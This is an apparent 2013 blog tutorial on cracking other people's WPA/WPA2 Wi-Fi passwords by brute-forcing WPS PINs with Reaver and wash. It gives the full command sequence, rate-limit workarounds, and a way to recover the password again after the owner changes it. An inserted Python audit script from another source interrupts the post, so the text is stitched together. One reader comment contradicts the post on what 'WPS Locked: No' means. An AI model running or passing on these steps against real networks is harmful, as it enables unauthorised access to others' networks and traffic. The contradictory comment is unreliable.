Saturday, February 16, 2013

WiFi password cracking using BackTrack with Reaver & wash (100% working)

WPA2-PSK Cracking

Reaver

What is Reaver?

Reaver implements a brute force attack against Wi-Fi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP's plaintext WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS PIN and recover the passphrase.


How do I use this tool?

As said above, just follow this tutorial :)

NOTE: Reaver doesn't need any dictionary files!

First, type:

    airmon-ng

As mentioned earlier, this shows you your wireless card's name.

I'll use wlan0

We need to put the wireless card into monitor mode, so type:

    airmon-ng start wlan0

After that, type:
    airodump-ng mon0



Now, copy the BSSID of the target AP.
Press CONTROL+C to cancel.

To see the APs that are vulnerable to WPS attacks, type:

    wash -i mon0

If the target AP is vulnerable, it should say:

    WPS Locked: No


Now, to start the attack, type:

    reaver -i mon0 -b [BSSID] -vv

Now, you'll need to wait around 2-10 hours.

If the AP is rate-limiting you with a message saying:

    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-trying

AND

if Reaver says that it is trying the same PIN over and over, press CONTROL+C to cancel, then type:

    reaver --help

This will show you the help menu, and you can start playing with the options that you have.

I usually add -c, -S and -L:

    reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -S -L -vv

This one works great for me, so keep playing with the options until it works!

When it reaches 100% it should give you some lines; the password is the one after:

    WPS PSK: 'PASSWORD HERE'

And here it is!

You should also remember the PIN:

    WPS PIN: PIN HERE

Now, let's say for some reason, the router's owner changed the password for his WiFi.

Since you already have the PIN, type:

    reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -p [PIN NUMBER] -vv

And it should give you the password in a matter of seconds!
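For the defender's side of the wash and Reaver steps above, here is an added audit script (not code from this post, nor from the Reaver or wash projects). It reads a wash-style scan, lists the access points whose registrar still answers PIN attempts ("WPS Locked: No"), and works out why the 4-10 hour figure holds: the registrar confirms the PIN in two halves and the eighth digit is a checksum, so the search space is 10^4 + 10^3 = 11,000 guesses, not 10^8. The wash column layout, the attempt rate and the lockout figures are assumptions, and the scan lines are constructed, not a real capture.

```python
"""Audit helper for the wash / Reaver workflow above: list the access
points in a wash scan that still answer WPS PIN attempts ("WPS Locked: No")
and estimate how long a registrar-PIN brute force against each would take.
Added example, not code from this post or from the Reaver/wash projects.
Assumptions: the wash column layout, the attempt rate and the lockout
figures; the scan lines are constructed, not a real capture."""

from dataclasses import dataclass

# Constructed sample in an assumed wash-style table layout (not real output).
SAMPLE_WASH_OUTPUT = """\
BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
-----------------------------------------------------------------
00:11:22:33:44:55  6        -41   1.0          No          OfficeNet
66:77:88:99:AA:BB  11       -67   1.0          Yes         GuestNet
CC:DD:EE:FF:00:11  1        -52   2.0          No          Lab AP 2
"""


@dataclass
class WpsAp:
    bssid: str
    channel: int
    locked: bool
    essid: str


def parse_wash(text: str) -> list[WpsAp]:
    """Parse the assumed wash table: header and rule lines are skipped,
    a data row is recognised by a MAC address in its first column."""
    aps = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or parts[0].count(":") != 5:
            continue
        bssid, channel, _rssi, _version, locked = parts[:5]
        essid = " ".join(parts[5:])  # an ESSID may contain spaces
        aps.append(WpsAp(bssid, int(channel), locked.lower() == "yes", essid))
    return aps


def unlocked_wps_aps(text: str) -> list[str]:
    """BSSIDs whose registrar is not locked, i.e. the ones to fix first."""
    return [ap.bssid for ap in parse_wash(text) if not ap.locked]


def wps_pin_checksum(first_seven: int) -> int:
    """Checksum digit the WPS spec derives from the first seven PIN digits
    (weights 3,1,3,1,... counted from the right); this is why the eighth
    digit never has to be guessed."""
    accum = 0
    while first_seven:
        accum += 3 * (first_seven % 10)
        first_seven //= 10
        accum += first_seven % 10
        first_seven //= 10
    return (10 - accum % 10) % 10


def wps_max_attempts() -> int:
    """The registrar confirms the PIN in two halves, so the worst case is
    10**4 (first half) + 10**3 (second half minus checksum), not 10**8."""
    return 10**4 + 10**3


def hours_to_crack(attempts: float, per_second: float,
                   lockout_every: int = 0, lockout_seconds: float = 0) -> float:
    """Wall-clock hours for `attempts` guesses at `per_second`, adding a
    lockout pause after every `lockout_every` attempts (0 = no lockout)."""
    seconds = attempts / per_second
    if lockout_every:
        seconds += (attempts // lockout_every) * lockout_seconds
    return seconds / 3600


if __name__ == "__main__":
    worst, expected = wps_max_attempts(), wps_max_attempts() / 2
    rate = 0.5  # assumed: one PIN exchange every 2 s, roughly what 4-10 h implies
    for bssid in unlocked_wps_aps(SAMPLE_WASH_OUTPUT):
        print(f"{bssid}: WPS unlocked; expected {hours_to_crack(expected, rate):.1f} h, "
              f"worst {hours_to_crack(worst, rate):.1f} h, "
              f"with a 60 s lockout per 10 attempts {hours_to_crack(worst, rate, 10, 60):.1f} h")
    # The 60 s lockout the post mentions only multiplies the time; disabling
    # WPS on the AP is what removes the 11,000-guess ceiling altogether.
```

Run against the constructed scan it reports two unlocked APs; the lockout column shows that an AP's rate limiting stretches the worst case from about 6 hours to about 24 at the assumed rate, which is why the remediation for "WPS Locked: No" is to turn WPS off rather than rely on the limiter.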

3 comments:

  1. Great tutorial, thanks for sharing.
    I was confused whether "WPS Locked: No" means vulnerable or not, and you cleared it up.

  2. No means it's not vulnerable.
